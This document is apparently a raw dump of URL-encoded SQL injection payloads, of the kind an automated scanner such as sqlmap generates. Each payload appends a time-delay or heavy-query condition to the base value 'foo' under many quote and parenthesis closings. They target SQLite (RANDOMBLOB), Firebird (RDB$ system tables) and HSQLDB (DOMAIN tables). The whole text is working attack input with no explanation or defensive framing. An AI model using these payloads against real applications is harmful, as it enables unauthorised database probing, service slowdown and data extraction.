foo%27%29%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%29%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%29%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%29%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%29%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%25%27%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%25%27%29%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%25%27%29%29%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%25%27%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%00%27%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%00%27%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%20WHERE%202949%3D2949%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%29%20WHERE%201699%3D1699%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%29%20WHERE%201354%3D1354%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%20WHERE%208638%3D8638%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%20WHERE%209777%3D9777%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%20WHERE%204261%3D4261%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%7C%7C%28SELECT%20%27PkMg%27%20FROM%20DUAL%20WHERE%201268%3D1268%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%7C%7C%28SELECT%20%27qOol%27%20WHERE%205882%3D5882%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%2B%28SELECT%20wDnh%20WHERE%206094%3D6094%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%2B%28SELECT%20%27HNgj%27%20WHERE%205526%3D5526%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%20IN%20BOOLEAN%20MODE%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 foo%27%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 foo%27%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 foo%22%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 foo%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%285796%3D5796 foo%29%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%287252%3D7252 foo%29%29%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%287628%3D7628 foo%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 foo%27%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27KwGJ%27%3D%27KwGJ foo%27%29%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27nerG%27%3D%27nerG foo%27%29%29%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27ZvSe%27%3D%27ZvSe foo%27%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27pCdp%27%3D%27pCdp foo%27%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27XlFk%27%20LIKE%20%27XlFk foo%27%29%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27CFKd%27%20LIKE%20%27CFKd foo%27%29%29%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27iHwG%27%20LIKE%20%27iHwG foo%27%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27stNR%27%20LIKE%20%27stNR foo%22%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%22YVLm%22%3D%22YVLm foo%22%29%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%22Lvsx%22%3D%22Lvsx foo%22%29%29%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%22zGCF%22%3D%22zGCF foo%22%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%22iMFF%22%3D%22iMFF foo%22%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%22XRIX%22%20LIKE%20%22XRIX foo%22%29%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%22YPyh%22%20LIKE%20%22YPyh foo%22%29%29%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%22qvNG%22%20LIKE%20%22qvNG foo%22%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%22GRJo%22%20LIKE%20%22GRJo foo%25%27%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27nVNV%27%3D%27nVNV foo%00%27%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27uvPV%27%3D%27uvPV foo%27%29%20WHERE%208665%3D8665%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 foo%22%29%20WHERE%204844%3D4844%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 foo%29%20WHERE%202331%3D2331%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 foo%27%20WHERE%202624%3D2624%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 foo%22%20WHERE%205569%3D5569%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 foo%20WHERE%205593%3D5593%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 foo%27%7C%7C%28SELECT%20%27WPiC%27%20FROM%20DUAL%20WHERE%204117%3D4117%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27LXML%27%20WHERE%202740%3D2740%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20pfGm%20WHERE%208137%3D8137%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%29%2B%27 foo%27%2B%28SELECT%20%27WAYm%27%20WHERE%208424%3D8424%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%206858%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%23 foo%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%22%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%29%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%29%29%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%29%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%29%29%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%29%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%29%29%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%22%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%22%29%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%22%29%29%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%22%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%22%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%22%29%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%22%29%29%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%22%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%25%27%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%25%27%29%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%25%27%29%29%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%25%27%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%00%27%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%00%27%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%29%20WHERE%202794%3D2794%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%22%29%20WHERE%208147%3D8147%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%29%20WHERE%207748%3D7748%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%20WHERE%204670%3D4670%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%22%20WHERE%202539%3D2539%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%20WHERE%209809%3D9809%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%7C%7C%28SELECT%20%27TdBh%27%20FROM%20DUAL%20WHERE%203255%3D3255%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%7C%7C%28SELECT%20%27Yaxt%27%20WHERE%203784%3D3784%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%2B%28SELECT%20uRlJ%20WHERE%209289%3D9289%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%2B%28SELECT%20%27WqTp%27%20WHERE%208648%3D8648%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%27%20IN%20BOOLEAN%20MODE%29%20AND%201336%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- foo%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 foo%27%29%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 foo%27%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 foo%22%20AND%203839%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 